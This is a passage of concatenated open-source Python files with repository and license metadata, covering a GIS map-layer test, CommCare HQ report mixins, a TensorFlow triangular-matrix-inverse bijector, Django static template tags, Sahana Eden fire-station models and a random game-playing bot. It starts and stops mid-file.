maps_enabled = True,
hybrid_enabled = True,
apikey = "FAKEAPIKEY",
)
def test_YahooLayer():
s3gis_tests.layer_test(
db,
db.gis_layer_yahoo,
yahoo_layer,
"S3.gis.Yahoo",
{
"Hybrid": u"Yahoo Hybrid",
"Maps": u"Yahoo Maps",
"Satellite": u"Yahoo Satellite",
},
session = session,
request = request,
)
def test_yahoo_scripts():
with s3gis_tests.InsertedRecord(db, db.gis_layer_yahoo, yahoo_layer):
with s3gis_tests.AddedRole(session, session.s3.system_roles.MAP_ADMIN):
actual_output = str(
s3base.GIS().show_map(
catalogue_layers = True,
projection = 900913,
)
)
s3gis_tests.check_scripts(
actual_output,
[
"http://api.maps.yahoo.com/ajaxymap?v=3.8&appid=FAKEAPIKEY"
],
request
)
|
mit
|
qedsoftware/commcare-hq
|
corehq/apps/reports/standard/__init__.py
|
1
|
8604
|
from datetime import datetime
import dateutil
from django.core.cache import cache
from django.core.urlresolvers import reverse
from corehq.apps.casegroups.models import CommCareCaseGroup
from corehq.apps.groups.models import Group
from corehq.apps.reports import util
from corehq.apps.reports.dispatcher import ProjectReportDispatcher, CustomProjectReportDispatcher
from corehq.apps.reports.exceptions import BadRequestError
from corehq.apps.reports.filters.users import UserTypeFilter
from corehq.apps.reports.generic import GenericReportView
from corehq.apps.reports.filters.select import MonthFilter, YearFilter
from corehq.apps.users.models import CommCareUser
from dimagi.utils.dates import DateSpan
from django.utils.translation import ugettext_noop
from dimagi.utils.decorators.memoized import memoized
class ProjectReport(GenericReportView):
# overriding properties from GenericReportView
section_name = ugettext_noop("Project Reports")
base_template = 'reports/base_template.html'
dispatcher = ProjectReportDispatcher
asynchronous = True
@property
def default_report_url(self):
return reverse('reports_home', args=[self.request.project])
class CustomProjectReport(ProjectReport):
dispatcher = CustomProjectReportDispatcher
emailable = True
class CommCareUserMemoizer(object):
@memoized
def by_domain(self, domain, is_active=True):
users = CommCareUser.by_domain(domain, is_active=is_active)
for user in users:
# put users in the cache for get_by_user_id
# so that function never has to touch the database
self.get_by_user_id.get_cache(self)[(self, user.user_id)] = user
return users
@memoized
def get_by_user_id(self, user_id):
return CommCareUser.get_by_user_id(user_id)
class ProjectReportParametersMixin(object):
"""
All the parameters necessary for the project reports.
Intended to be mixed in with a GenericReportView object.
"""
default_case_type = None
filter_group_name = None
filter_users_field_class = UserTypeFilter
include_inactive = False
# set this to set the report's user ids from within the report
# (i.e. based on a filter's return value).
override_user_ids = None
@property
@memoized
def CommCareUser(self):
return CommCareUserMemoizer()
@memoized
def get_all_users_by_domain(self, group=None, user_ids=None, user_filter=None, simplified=False):
return list(util.get_all_users_by_domain(
domain=self.domain,
group=group,
user_ids=user_ids,
user_filter=user_filter,
simplified=simplified,
CommCareUser=self.CommCareUser
))
@property
@memoized
def user_filter(self):
return self.filter_users_field_class.get_user_filter(self.request)[0]
@property
@memoized
def default_user_filter(self):
return self.filter_users_field_class.get_user_filter(None)[0]
@property
def group_id(self):
return self.request.GET.get('group', '')
@property
@memoized
def group(self):
return Group.get(self.group_id) if self.group_id else None
@property
def individual(self):
"""
todo: remember this: if self.individual and self.users:
self.name = "%s for %s" % (self.name, self.users[0].raw_username)
"""
return self.request_params.get('individual', '')
@property
def mobile_worker_ids(self):
ids = self.request.GET.getlist('select_mw')
if '_all' in ids or self.request.GET.get('all_mws', 'off') == 'on':
cache_str = "mw_ids:%s" % self.domain
ids = cache.get(cache_str)
if not ids:
cc_users = CommCareUser.by_domain(self.domain)
if self.include_inactive:
cc_users += CommCareUser.by_domain(self.domain, is_active=False)
ids = [ccu._id for ccu in cc_users]
cache.set(cache_str, ids, 24*60*60)
return ids
@property
@memoized
def users(self):
if self.filter_group_name and not (self.group_id or self.individual):
group = Group.by_name(self.domain, self.filter_group_name)
else:
group = self.group
if self.override_user_ids is not None:
user_ids = self.override_user_ids
else:
user_ids = [self.individual]
return self.get_all_users_by_domain(
group=group,
user_ids=tuple(user_ids),
user_filter=tuple(self.user_filter),
simplified=True
)
@property
@memoized
def user_ids(self):
return [user.user_id for user in self.users]
@property
@memoized
def usernames(self):
return {user.user_id: user.username_in_report for user in self.users}
@property
def history(self):
history = self.request_params.get('history', '')
if history:
try:
return dateutil.parser.parse(history)
except ValueError:
pass
@property
def case_type(self):
return self.default_case_type or self.request_params.get('case_type', '')
@property
def case_status(self):
from corehq.apps.reports.filters.select import SelectOpenCloseFilter
return self.request_params.get(SelectOpenCloseFilter.slug, '')
@property
def case_group_ids(self):
return filter(None, self.request.GET.getlist('case_group'))
@property
@memoized
def case_groups(self):
return [CommCareCaseGroup.get(g) for g in self.case_group_ids]
@property
@memoized
def cases_by_case_group(self):
case_ids = []
for group in self.case_groups:
case_ids.extend(group.cases)
return case_ids
class CouchCachedReportMixin(object):
"""
Use this mixin for caching reports as objects in couch.
"""
_cached_report = None
@property
def cached_report(self):
if not self._cached_report:
self._cached_report = self.fetch_cached_report()
return self._cached_report
def fetch_cached_report(self):
"""
Here's where you generate your cached report.
"""
raise NotImplementedError
class DatespanMixin(object):
"""
Use this where you'd like to include the datespan field.
"""
datespan_field = 'corehq.apps.reports.filters.dates.DatespanFilter'
datespan_default_days = 7
datespan_max_days = None
inclusive = True
_datespan = None
@property
def datespan(self):
if self._datespan is None:
datespan = self.default_datespan
if self.request.datespan.is_valid() and not self.request.datespan.is_default:
datespan.enddate = self.request.datespan.enddate
datespan.startdate = self.request.datespan.startdate
datespan.is_default = False
elif self.request.datespan.get_validation_reason() == "You can't use dates earlier than the year 1900":
raise BadRequestError()
self.request.datespan = datespan
# todo: don't update self.context here. find a better place! AGH! Sorry, sorry.
self.context.update(dict(datespan=datespan))
self._datespan = datespan
return self._datespan
@property
def default_datespan(self):
datespan = DateSpan.since(self.datespan_default_days, timezone=self.timezone, inclusive=self.inclusive)
datespan.max_days = self.datespan_max_days
datespan.is_default = True
return datespan
class MonthYearMixin(object):
"""
Similar to DatespanMixin, but works with MonthField and YearField
"""
fields = [MonthFilter, YearFilter]
_datespan = None
@property
def datespan(self):
if self._datespan is None:
datespan = DateSpan.from_month(self.month, self.year)
self.request.datespan = datespan
self.context.update(dict(datespan=datespan))
self._datespan = datespan
return self._datespan
@property
def month(self):
if 'month' in self.request_params:
return int(self.request_params['month'])
else:
return datetime.utcnow().month
@property
def year(self):
if 'year' in self.request_params:
return int(self.request_params['year'])
else:
return datetime.utcnow().year
|
bsd-3-clause
|
yanchen036/tensorflow
|
tensorflow/contrib/distributions/python/ops/bijectors/matrix_inverse_tril.py
|
3
|
5272
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""MatrixInverseTriL bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"MatrixInverseTriL",
]
class MatrixInverseTriL(bijector.Bijector):
"""Computes `g(L) = inv(L)`, where `L` is a lower-triangular matrix.
`L` must be nonsingular; equivalently, all diagonal entries of `L` must be
nonzero.
The input must have `rank >= 2`. The input is treated as a batch of matrices
with batch shape `input.shape[:-2]`, where each matrix has dimensions
`input.shape[-2]` by `input.shape[-1]` (hence `input.shape[-2]` must equal
`input.shape[-1]`).
#### Examples
```python
tfd.bijectors.MatrixInverseTriL().forward(x=[[1., 0], [2, 1]])
# Result: [[1., 0], [-2, 1]], i.e., inv(x)
tfd.bijectors.MatrixInverseTriL().inverse(y=[[1., 0], [-2, 1]])
# Result: [[1., 0], [2, 1]], i.e., inv(y).
```
"""
def __init__(self, validate_args=False, name="matrix_inverse_tril"):
"""Instantiates the `MatrixInverseTriL` bijector.
Args:
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str` name given to ops managed by this object.
"""
self._graph_parents = []
self._name = name
super(MatrixInverseTriL, self).__init__(
forward_min_event_ndims=2,
validate_args=validate_args,
name=name)
def _forward(self, x):
with ops.control_dependencies(self._assertions(x)):
shape = array_ops.shape(x)
return linalg_ops.matrix_triangular_solve(
x, linalg_ops.eye(shape[-1], batch_shape=shape[:-2]), lower=True)
def _inverse(self, y):
return self._forward(y)
def _forward_log_det_jacobian(self, x):
# Calculation of the Jacobian:
#
# Let X = (x_{ij}), 0 <= i,j < n, be a matrix of indeterminates. Let Z =
# X^{-1} where Z = (z_{ij}). Then
#
# dZ/dx_{ij} = (d/dt | t=0) Y(t)^{-1},
#
# where Y(t) = X + t*E_{ij} and E_{ij} is the matrix with a 1 in the (i,j)
# entry and zeros elsewhere. By the product rule,
#
# 0 = d/dt [Identity matrix]
# = d/dt [Y Y^{-1}]
# = Y d/dt[Y^{-1}] + dY/dt Y^{-1}
#
# so
#
# d/dt[Y^{-1}] = -Y^{-1} dY/dt Y^{-1}
# = -Y^{-1} E_{ij} Y^{-1}.
#
# Evaluating at t=0,
#
# dZ/dx_{ij} = -Z E_{ij} Z.
#
# Taking the (r,s) entry of each side,
#
# dz_{rs}/dx_{ij} = -z_{ri}z_{sj}.
#
# Now, let J be the Jacobian dZ/dX, arranged as the n^2-by-n^2 matrix whose
# (r*n + s, i*n + j) entry is dz_{rs}/dx_{ij}. Considering J as an n-by-n
# block matrix with n-by-n blocks, the above expression for dz_{rs}/dx_{ij}
# shows that the block at position (r,i) is -z_{ri}Z. Hence
#
# J = -KroneckerProduct(Z, Z),
# det(J) = (-1)^(n^2) (det Z)^(2n)
# = (-1)^n (det X)^(-2n).
with ops.control_dependencies(self._assertions(x)):
return (-2. * math_ops.cast(array_ops.shape(x)[-1], x.dtype.base_dtype) *
math_ops.reduce_sum(
math_ops.log(math_ops.abs(array_ops.matrix_diag_part(x))),
axis=-1))
def _assertions(self, x):
if not self.validate_args:
return []
shape = array_ops.shape(x)
is_matrix = check_ops.assert_rank_at_least(
x, 2, message="Input must have rank at least 2.")
is_square = check_ops.assert_equal(
shape[-2], shape[-1], message="Input must be a square matrix.")
above_diagonal = array_ops.matrix_band_part(
array_ops.matrix_set_diag(
x, array_ops.zeros(shape[:-1], dtype=dtypes.float32)),
0, -1)
is_lower_triangular = check_ops.assert_equal(
above_diagonal, array_ops.zeros_like(above_diagonal),
message="Input must be lower triangular.")
# A lower triangular matrix is nonsingular iff all its diagonal entries are
# nonzero.
diag_part = array_ops.matrix_diag_part(x)
is_nonsingular = check_ops.assert_none_equal(
diag_part, array_ops.zeros_like(diag_part),
message="Input must have all diagonal entries nonzero.")
return [is_matrix, is_square, is_lower_triangular, is_nonsingular]
|
apache-2.0
|
webgeodatavore/django
|
django/templatetags/static.py
|
197
|
4052
|
from django import template
from django.utils.encoding import iri_to_uri
from django.utils.six.moves.urllib.parse import urljoin
register = template.Library()
class PrefixNode(template.Node):
def __repr__(self):
return "<PrefixNode for %r>" % self.name
def __init__(self, varname=None, name=None):
if name is None:
raise template.TemplateSyntaxError(
"Prefix nodes must be given a name to return.")
self.varname = varname
self.name = name
@classmethod
def handle_token(cls, parser, token, name):
"""
Class method to parse prefix node and return a Node.
"""
# token.split_contents() isn't useful here because tags using this method don't accept variable as arguments
tokens = token.contents.split()
if len(tokens) > 1 and tokens[1] != 'as':
raise template.TemplateSyntaxError(
"First argument in '%s' must be 'as'" % tokens[0])
if len(tokens) > 1:
varname = tokens[2]
else:
varname = None
return cls(varname, name)
@classmethod
def handle_simple(cls, name):
try:
from django.conf import settings
except ImportError:
prefix = ''
else:
prefix = iri_to_uri(getattr(settings, name, ''))
return prefix
def render(self, context):
prefix = self.handle_simple(self.name)
if self.varname is None:
return prefix
context[self.varname] = prefix
return ''
@register.tag
def get_static_prefix(parser, token):
"""
Populates a template variable with the static prefix,
``settings.STATIC_URL``.
Usage::
{% get_static_prefix [as varname] %}
Examples::
{% get_static_prefix %}
{% get_static_prefix as static_prefix %}
"""
return PrefixNode.handle_token(parser, token, "STATIC_URL")
@register.tag
def get_media_prefix(parser, token):
"""
Populates a template variable with the media prefix,
``settings.MEDIA_URL``.
Usage::
{% get_media_prefix [as varname] %}
Examples::
{% get_media_prefix %}
{% get_media_prefix as media_prefix %}
"""
return PrefixNode.handle_token(parser, token, "MEDIA_URL")
class StaticNode(template.Node):
def __init__(self, varname=None, path=None):
if path is None:
raise template.TemplateSyntaxError(
"Static template nodes must be given a path to return.")
self.path = path
self.varname = varname
def url(self, context):
path = self.path.resolve(context)
return self.handle_simple(path)
def render(self, context):
url = self.url(context)
if self.varname is None:
return url
context[self.varname] = url
return ''
@classmethod
def handle_simple(cls, path):
return urljoin(PrefixNode.handle_simple("STATIC_URL"), path)
@classmethod
def handle_token(cls, parser, token):
"""
Class method to parse prefix node and return a Node.
"""
bits = token.split_contents()
if len(bits) < 2:
raise template.TemplateSyntaxError(
"'%s' takes at least one argument (path to file)" % bits[0])
path = parser.compile_filter(bits[1])
if len(bits) >= 2 and bits[-2] == 'as':
varname = bits[3]
else:
varname = None
return cls(varname, path)
@register.tag('static')
def do_static(parser, token):
"""
Joins the given path with the STATIC_URL setting.
Usage::
{% static path [as varname] %}
Examples::
{% static "myapp/css/base.css" %}
{% static variable_with_path %}
{% static "myapp/css/base.css" as admin_base_css %}
{% static variable_with_path as varname %}
"""
return StaticNode.handle_token(parser, token)
def static(path):
return StaticNode.handle_simple(path)
|
bsd-3-clause
|
sammyshj/gci
|
modules/s3db/fire.py
|
4
|
21906
|
# -*- coding: utf-8 -*-
""" Sahana Eden Fire Models
@copyright: 2009-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3FireModel",
"S3FireStationModel",
]
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3FireModel(S3Model):
"""
Fire Zones: Burn Perimeter, Burnt zone, Evacuation Zone, etc
"""
names = ["fire_zone_type",
"fire_zone",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# -----------------------------------------------------------
# Fire Zone Types
tablename = "fire_zone_type"
table = define_table(tablename,
Field("name",
label=T("Name")),
# @ToDo: Currently unused - apply in layer_feature for now
Field("style", "text",
label=T("Style")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ZONE_TYPE = T("Add Zone Type")
crud_strings[tablename] = Storage(
title_create = ADD_ZONE_TYPE,
title_display = T("Zone Type Details"),
title_list = T("Zone Types"),
title_update = T("Edit Zone Type"),
title_search = T("Search Zone Types"),
title_upload = T("Import Zone Types"),
subtitle_create = T("Add New Zone Type"),
label_list_button = T("List Zone Types"),
label_create_button = T("Add New Zone Type"),
label_delete_button = T("Delete Zone Type"),
msg_record_created = T("Zone Type added"),
msg_record_modified = T("Zone Type updated"),
msg_record_deleted = T("Zone Type deleted"),
msg_list_empty = T("No Zone Types currently registered"))
zone_type_represent = S3Represent(lookup=tablename)
self.configure(tablename,
deduplicate = self.fire_zone_type_duplicate,
)
# -----------------------------------------------------------
# Fire Zones
tablename = "fire_zone"
table = define_table(tablename,
Field("name",
label=T("Name")),
Field("zone_type_id", db.fire_zone_type,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_zone_type.id",
zone_type_represent,
sort=True)),
represent = zone_type_represent,
comment = S3AddResourceLink(c="fire",
f="zone_type",
label=ADD_ZONE_TYPE,
tooltip=T("Select a Zone Type from the list or click 'Add Zone Type'")),
label=T("Type")),
self.gis_location_id(
widget = S3LocationSelectorWidget(
catalog_layers=True,
polygon=True
)
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
title_create = T("Add Zone"),
title_display = T("Zone Details"),
title_list = T("Zones"),
title_update = T("Edit Zone"),
title_search = T("Search Zones"),
title_upload = T("Import Zones"),
subtitle_create = T("Add New Zone"),
label_list_button = T("List Zones"),
label_create_button = T("Add New Zone"),
label_delete_button = T("Delete Zone"),
msg_record_created = T("Zone added"),
msg_record_modified = T("Zone updated"),
msg_record_deleted = T("Zone deleted"),
msg_list_empty = T("No Zones currently registered"))
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return Storage()
# -------------------------------------------------------------------------
@staticmethod
def fire_zone_type_duplicate(item):
"""
Zone Type record duplicate detection, used for the deduplicate hook
@param item: the S3ImportItem to check
"""
if item.tablename == "fire_zone_type":
table = item.table
query = (table.name == item.data.name)
row = current.db(query).select(table.id,
limitby=(0, 1)).first()
if row:
item.id = row.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3FireStationModel(S3Model):
"""
A Model to manage Fire Stations:
http://eden.sahanafoundation.org/wiki/Deployments/Bombeiros
"""
names = ["fire_station",
"fire_station_vehicle",
"fire_water_source",
"fire_hazard_point",
"fire_staff_on_duty"
]
def model(self):
T = current.T
db = current.db
request = current.request
person_id = self.pr_person_id
location_id = self.gis_location_id
organisation_id = self.org_organisation_id
human_resource_id = self.hrm_human_resource_id
ireport_id = self.irs_ireport_id
vehicle_id = self.vehicle_vehicle_id
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# =====================================================================
# Fire Station
#
fire_station_types = {
1: T("Fire Station"),
9: T("Unknown type of facility"),
}
tablename = "fire_station"
table = define_table(tablename,
self.super_link("site_id", "org_site"),
Field("name", notnull=True, length=64,
label = T("Name")),
Field("code", unique=True, length=64,
label = T("Code")),
Field("facility_type", "integer",
label = T("Facility Type"),
requires = IS_NULL_OR(IS_IN_SET(fire_station_types)),
default = 1,
represent = lambda opt: \
fire_station_types.get(opt, T("not specified"))
),
organisation_id(),
location_id(),
Field("phone", label = T("Phone"),
requires = IS_NULL_OR(s3_phone_requires)),
Field("website", label=T("Website"),
requires = IS_NULL_OR(IS_URL()),
represent = lambda url: s3_url_represent(url)),
Field("email", label = T("Email"),
requires = IS_NULL_OR(IS_EMAIL())
),
Field("fax", label = T("Fax"),
requires = IS_NULL_OR(s3_phone_requires)),
Field("obsolete", "boolean",
label = T("Obsolete"),
represent = lambda bool: \
(bool and [T("Obsolete")] or [current.messages["NONE"]])[0],
default = False,
readable = False,
writable = False),
s3_comments(),
*s3_meta_fields())
self.configure("fire_station",
super_entity="org_site")
station_id = S3ReusableField("station_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_station.id",
self.fire_station_represent)),
represent = self.fire_station_represent,
label = T("Station"),
ondelete = "CASCADE"
)
# CRUD strings
ADD_FIRE_STATION = T("Add Fire Station")
crud_strings[tablename] = Storage(
title_create = ADD_FIRE_STATION,
title_display = T("Fire Station Details"),
title_list = T("Fire Stations"),
title_update = T("Edit Station Details"),
title_search = T("Search for Fire Station"),
title_upload = T("Upload Fire Stations List"),
title_map = T("Map of Fire Stations"),
subtitle_create = T("Add New Fire Station"),
label_list_button = T("List Fire Stations"),
label_create_button = ADD_FIRE_STATION,
label_delete_button = T("Delete Fire Station"),
msg_record_created = T("Fire Station added"),
msg_record_modified = T("Fire Station updated"),
msg_record_deleted = T("Fire Station deleted"),
msg_no_match = T("No Fire Stations could be found"),
msg_list_empty = T("No Fire Stations currently registered"))
add_component("vehicle_vehicle",
fire_station = Storage(link="fire_station_vehicle",
joinby="station_id",
key="vehicle_id",
actuate="replace"))
add_component("fire_shift",
fire_station = "station_id")
add_component("fire_shift_staff",
fire_station = "station_id")
# =====================================================================
# Vehicles of Fire stations
#
tablename = "fire_station_vehicle"
table = define_table(tablename,
station_id(),
vehicle_id(),
*s3_meta_fields()
)
# CRUD strings
ADD_VEHICLE = T("Add Vehicle")
crud_strings[tablename] = Storage(
title_create = ADD_VEHICLE,
title_display = T("Vehicle Details"),
title_list = T("Vehicles"),
title_update = T("Edit Vehicle Details"),
title_search = T("Search for Vehicles"),
title_upload = T("Upload Vehicles List"),
subtitle_create = T("Add New Vehicle"),
label_list_button = T("List Vehicles"),
label_create_button = ADD_VEHICLE,
label_delete_button = T("Delete Vehicle"),
msg_record_created = T("Vehicle added"),
msg_record_modified = T("Vehicle updated"),
msg_record_deleted = T("Vehicle deleted"),
msg_no_match = T("No Vehicles could be found"),
msg_list_empty = T("No Vehicles currently registered"))
self.set_method("fire", "station",
method="vehicle_report",
action=self.vehicle_report)
# =====================================================================
# Water Sources
#
tablename = "fire_water_source"
table = define_table(tablename,
Field("name", "string"),
location_id(),
#Field("good_for_human_usage", "boolean"),
#Field("fresh", "boolean"),
#Field("Salt", "boolean"),
#Field("toponymy", "string"),
#Field("parish", "string"),
#Field("type", "string"),
#Field("owner", "string"),
#person_id(),
#organisation_id(),
#Field("shape", "string"),
#Field("diameter", "string"),
#Field("depth", "string"),
#Field("volume", "integer"),
#Field("lenght", "integer"),
#Field("height", "integer"),
#Field("usefull_volume", "integer"),
#Field("catchment", "integer"),
#Field("area", "integer"),
#Field("date", "date"),
#Field("access_type", "string"),
#Field("previews_usage", "boolean"),
#Field("car_access", "string"),
#Field("mid_truck_access", "string"),
#Field("truck_access", "string"),
#Field("distance_from_trees", "integer"),
#Field("distance_from_buildings", "integer"),
#Field("helicopter_access", "string"),
#Field("previews_usage_air", "boolean"),
#Field("car_movment_conditions", "string"),
#Field("midtruck_movment_conditions", "string"),
#Field("truck_movment_conditions", "string"),
#Field("powerline_distance", "integer"),
#Field("distance_other_risks", "integer"),
#Field("anti_seismic_construction", "boolean"),
#Field("isolated_from_air", "boolean"),
#Field("hermetic", "boolean"),
s3_comments(),
*s3_meta_fields())
# =====================================================================
# Hazards
# - this is long-term hazards, not incidents
#
tablename = "fire_hazard_point"
table = define_table(tablename,
location_id(),
Field("name", "string"),
# What are the Org & Person for? Contacts?
organisation_id(),
person_id(),
s3_comments(),
*s3_meta_fields())
# =====================================================================
# Shifts
#
tablename = "fire_shift"
table = define_table(tablename,
station_id(),
Field("name"),
s3_datetime("start_time",
empty=False,
default="now"
),
s3_datetime("end_time",
empty=False,
default="now"
),
*s3_meta_fields())
shift_id = S3ReusableField("shift_id", table,
requires = IS_NULL_OR(
IS_ONE_OF(db, "fire_shift.id",
self.fire_shift_represent)),
represent = self.fire_shift_represent,
label = T("Shift"),
ondelete = "CASCADE")
# ---------------------------------------------------------------------
tablename = "fire_shift_staff"
table = define_table(tablename,
station_id(),
#shift_id(),
human_resource_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return Storage(
# used by IRS
fire_staff_on_duty = self.fire_staff_on_duty
)
# -------------------------------------------------------------------------
@staticmethod
def fire_station_represent(id, row=None):
""" FK representation """
if row:
return row.name
elif not id:
return current.messages["NONE"]
db = current.db
table = db.fire_station
r = db(table.id == id).select(table.name,
limitby = (0, 1)).first()
try:
return r.name
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def fire_shift_represent(id, row=None):
"""
Represent a Shift by Start and End times
"""
if row:
pass
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.fire_shift
row = db(table.id == id).select(table.start_time,
table.end_time,
limitby=(0, 1)).first()
try:
return "%s - %s" % (row.start_time, row.end_time)
except:
current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def fire_staff_on_duty(station_id=None):
"""
Return a query for hrm_human_resource filtering
for entries which are linked to a current shift
"""
db = current.db
staff = db.hrm_human_resource
roster = db.fire_shift_staff
query = (staff.id == roster.human_resource_id) & \
(roster.deleted != True)
if station_id is not None:
query &= (roster.station_id == station_id)
return query
# -------------------------------------------------------------------------
@staticmethod
def vehicle_report(r, **attr):
"""
Custom method to provide a report on Vehicle Deployment Times
- this is one of the main tools currently used to manage an Incident
"""
rheader = attr.get("rheader", None)
if rheader:
rheader = rheader(r)
station_id = r.id
if station_id:
s3db = current.s3db
dtable = s3db.irs_ireport_vehicle
vtable = s3db.vehicle_vehicle
stable = s3db.fire_station_vehicle
query = (stable.station_id == station_id) & \
(stable.vehicle_id == vtable.id) & \
(vtable.asset_id == dtable.asset_id)
current.response.s3.crud_strings["irs_ireport_vehicle"] = Storage(
title_report = "Vehicle Deployment Times"
)
req = r.factory(prefix="irs",
name="ireport_vehicle",
args=["report"],
vars=Storage(
rows = "asset_id",
cols = "ireport_id",
fact = "minutes",
aggregate = "sum")
)
req.set_handler("report", S3Report())
req.resource.add_filter(query)
return req(rheader=rheader)
# END =========================================================================
|
mit
|
thilaire/CodingGameServer
|
games/Networks/server/AliceRandomPlayer.py
|
1
|
4279
|
"""
* --------------------- *
| |
| Coding Game Server |
| |
* --------------------- *
Authors: M. Pecheux (based on T. Hilaire and J. Brajard template file)
Licence: GPL
File: aliceRandomPlayer.py
Contains the class aliceRandomPlayer
-> defines a dummy Alice player that play randomly every time (but do not loose)
Copyright 2017 M. Pecheux
"""
from CGSserver.Player import TrainingPlayer
from random import choice
from .Constants import CAPTURE, DESTROY, LINK_H, LINK_V, DO_NOTHING, \
LINK_ENERGY, DESTROY_ENERGY
boolConv = {'true': True, 'false': False}
def check_type(element, typecheck):
"""Function that checks for class type (class is not yet
defined, so cannot use type() built-in...)"""
return element is not None and element.__class__.__name__ == typecheck
class AliceRandomPlayer(TrainingPlayer):
"""
This class implements Alice: a training player that plays... randomly
Every player should be able to beat him
"""
def __init__(self, **options):
"""
Initialize the training player
The option "advanced=true" (default) or "advanced=false" is possible
This option indicates if the player can also destroy/create links
"""
super().__init__('ALICE')
# check "advanced" option
if "advanced" not in options:
self.advanced = True
elif options["advanced"].lower() in boolConv:
self.advanced = boolConv[options["advanced"].lower()]
else:
raise ValueError("The option advanced=%s is incorrect." % options["advanced"])
def neighbours(self, x, y, us):
"""
:param x: coordinate of a point
:param y: coordinate of a point
:return: list of neighbours of the point (x,y)
"""
neighbours = []
if x > 1:
n = self.game.board[x-2][y]
l = self.game.board[x-1][y]
if check_type(n, "Node") and ( n.owner != us) and \
check_type(l, "Link") and l.direction == 0:
neighbours.append(n)
if x < self.game.L-2:
n = self.game.board[x+2][y]
l = self.game.board[x+1][y]
if check_type(n, "Node") and (n.owner != us) and \
check_type(l, "Link") and l.direction == 0:
neighbours.append(n)
if y > 1:
n = self.game.board[x][y-2]
l = self.game.board[x][y-1]
if check_type(n, "Node") and (n.owner != us) and \
check_type(l, "Link") and l.direction == 1:
neighbours.append(n)
if y < self.game.H-2:
n = self.game.board[x][y+2]
l = self.game.board[x][y+1]
if check_type(n, "Node") and (n.owner != us) and \
check_type(l, "Link") and l.direction == 1:
neighbours.append(n)
return neighbours
def playMove(self):
"""
Plays the move -> here a random move
Returns the move (string %d %d %d)
"""
# get our player number
us = 0 if (self.game.players[0] is self) else 1
# build the list of the possible moves
moves = []
# capture node
# get currently owned nodes neighbours and add them to the moved list
for node in self.game.playerNode[us]:
for n in self.neighbours(node.x, node.y, us):
moves.append("%d %d %d" % (CAPTURE, n.x, n.y))
# advanced moves
if self.advanced:
# destroy link
if self.game.playerEnergy[us] >= DESTROY_ENERGY:
linkCells = [(x,y) for x in range(self.game.L-1) for y in range(self.game.H-1) if check_type(self.game.board[x][y], "link")]
if len(linkCells) > 0:
lx, ly = choice(linkCells)
moves.append("%d %d %d" % (DESTROY, lx, ly))
# create link
if self.game.playerEnergy[us] >= LINK_ENERGY:
blankCells = []
for x in range(1, self.game.L-1):
for y in range(1, self.game.H-1):
if self.game.board[x][y] is None:
if check_type(self.game.board[x-1][y], "Node") and \
check_type(self.game.board[x+1][y], "Node"):
blankCells.append((x, y, 0))
elif check_type(self.game.board[x][y-1], "Node") and \
check_type(self.game.board[x][y+1], "Node"):
blankCells.append((x, y, 1))
if len(blankCells) > 0:
cx, cy, d = choice(blankCells)
if d == 0:
moves.append("%d %d %d" % (LINK_H, cx, cy))
elif d == 1:
moves.append("%d %d %d" % (LINK_V, cx, cy))
# choose one possible move
if moves:
return choice(moves)
else:
# sometimes, we cannot move...
self.game.sendComment(self, "I am blocked... I cannot play...")
return "%d 0 0" % DO_NOTHING
|
gpl-3.0
|
bguillot/OpenUpgrade
|
openerp/tools/amount_to_text_en.py
|
441
|
5103
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
